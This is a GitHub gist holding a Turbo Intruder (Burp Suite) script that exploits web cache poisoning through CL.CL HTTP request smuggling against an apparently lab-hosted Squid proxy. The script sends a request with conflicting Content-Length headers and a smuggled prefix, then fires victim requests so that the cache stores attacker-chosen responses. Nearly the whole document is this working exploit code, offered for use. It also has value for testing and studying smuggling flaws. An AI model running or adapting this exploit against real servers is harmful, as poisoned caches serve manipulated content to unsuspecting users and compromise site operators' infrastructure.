Skip to content

Instantly share code, notes, and snippets.

@DanielIntruder
Created October 20, 2021 18:59
Show Gist options
  • Save DanielIntruder/e235ab83d095bde25219e0d4f178087d to your computer and use it in GitHub Desktop.
Save DanielIntruder/e235ab83d095bde25219e0d4f178087d to your computer and use it in GitHub Desktop.
A script to exploit cache poisoning using CL.CL request smuggling
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1, # if you increase this from 1, you may get false positives
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# The attack to send
attack = '''POST /b.shtml HTTP/1.1
Host: squid01.rslab
Connection: Keep-Alive
Content-Length: %d
Content-Length abcde: 0
'''
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /a.html HTTP/1.1
Something: '''
# The request engine will auto-fix the content-length for us
attack += prefix
attack = attack % len(prefix)
engine.queue(attack)
victim = '''GET /turbo.html HTTP/1.1
Host: squid01.rslab
'''
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment